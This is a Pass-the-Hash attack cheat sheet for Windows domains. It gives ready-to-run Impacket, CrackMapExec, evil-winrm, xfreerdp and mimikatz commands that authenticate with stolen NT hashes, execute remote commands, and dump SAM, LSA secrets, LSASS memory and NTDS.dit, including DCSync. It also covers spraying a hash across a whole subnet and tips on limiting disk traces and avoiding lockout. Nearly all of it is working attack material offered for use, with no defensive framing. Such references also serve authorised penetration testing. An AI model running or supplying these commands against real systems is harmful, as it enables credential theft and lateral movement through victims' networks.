
Overview

Pass-the-Hash (PtH) authenticates with the NT hash itself: NTLM challenge-response is computed from the hash, not the password, so there is no need to crack it. Works over any protocol that accepts NTLM authentication: SMB, WinRM, RDP (only when Restricted Admin mode is enabled), WMI, etc. Two caveats: cached domain logons (DCC2 / "mscash", what mimikatz lsadump::cache returns) are not NT hashes and cannot be passed, they must be cracked; and if the target refuses NTLM entirely, use the same NT hash for overpass-the-hash (request a Kerberos TGT with it) instead.

Impacket

impacket-psexec DOMAIN/user@TARGET -hashes aad3b435b51404eeaad3b435b51404ee:NTLM_HASH   # -hashes takes LM:NT
impacket-wmiexec DOMAIN/user@TARGET -hashes :NTLM_HASH                                  # LM part may be left empty
impacket-smbexec DOMAIN/user@TARGET -hashes :NTLM_HASH
impacket-atexec DOMAIN/user@TARGET -hashes :NTLM_HASH "whoami"
-hashes takes the form LM:NT. aad3b435b51404eeaad3b435b51404ee is the LM hash of an empty password, which is what every host with LM storage disabled reports, so it is interchangeable with leaving the LM part blank. All four tools need local admin on TARGET; psexec drops a service binary on ADMIN$, smbexec and atexec run commands through a service or scheduled task, and wmiexec goes over DCOM, so pick according to how much you want written to disk.

CrackMapExec

crackmapexec smb TARGET -u user -H NTLM_HASH                  # -H takes the NT hash (LM:NT also accepted); "Pwn3d!" = local admin
crackmapexec smb TARGET -u user -H NTLM_HASH -x "whoami"      # -x runs a cmd.exe command, -X a PowerShell command
crackmapexec smb TARGET -u user -H NTLM_HASH --sam            # Dump SAM (needs local admin)
crackmapexec smb TARGET -u user -H NTLM_HASH --lsa            # Dump LSA secrets (needs local admin)
crackmapexec smb TARGET -u user -H NTLM_HASH --local-auth     # user is a local account, not a domain account
crackmapexec winrm TARGET -u user -H NTLM_HASH                # user must be an admin or in Remote Management Users

Evil-WinRM

evil-winrm -i TARGET -u user -H NTLM_HASH

xfreerdp (RDP — Restricted Admin)

xfreerdp /v:TARGET /u:user /d:DOMAIN /pth:NTLM_HASH
Requires Restricted Admin mode enabled on the target (HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0); without it the server rejects the hash-based logon and you need the cleartext password. In a Restricted Admin session your credentials are not sent to the host, so further network hops from that session run as the machine account, not as you.

Mimikatz (Windows)

privilege::debug
sekurlsa::pth /user:administrator /domain:DOMAIN /ntlm:NTLM_HASH /run:cmd.exe
Needs an elevated mimikatz (privilege::debug must succeed). The spawned cmd.exe gets a new logon session with the NT hash injected, so network authentication from it uses that identity; a local "whoami" in that window still shows the original user, which is expected. Test it with something that authenticates remotely, e.g. dir \\TARGET\C$.

Spray Hash Across Subnet

crackmapexec smb 10.10.10.0/24 -u administrator -H NTLM_HASH --local-auth --continue-on-success
Hosts that answer "Pwn3d!" share the local admin hash. Use --local-auth when spraying a local account and --continue-on-success so CME keeps going after the first hit; without it a domain account spray stops at the first success. Spraying a domain account across a subnet counts one failed NTLM logon per host against its lockout threshold, so check the policy first.

Get the Hash

Source        | Tool
SAM database  | impacket-secretsdump (live), or reg save HKLM\SAM + reg save HKLM\SYSTEM then impacket-secretsdump -sam SAM -system SYSTEM LOCAL
LSASS memory  | mimikatz sekurlsa::logonpasswords, or procdump -ma lsass.exe then mimikatz sekurlsa::minidump offline
NTDS.dit      | impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL; ntdsutil "ac i ntds" "ifm" "create full C:\path" q q to export it
DCSync        | impacket-secretsdump -just-dc (needs replication rights, i.e. Domain Admin or equivalent)
Cached creds  | mimikatz lsadump::cache (DCC2 hashes: crack them, they cannot be passed)

Quick Reference

Task     | Command
PsExec   | impacket-psexec DOM/user@TARGET -hashes :HASH
WinRM    | evil-winrm -i TARGET -u user -H HASH
CME      | crackmapexec smb TARGET -u user -H HASH
Mimikatz | sekurlsa::pth /user:admin /domain:DOM /ntlm:HASH /run:cmd.exe
Spray    | crackmapexec smb SUBNET -u admin -H HASH --local-auth --continue-on-success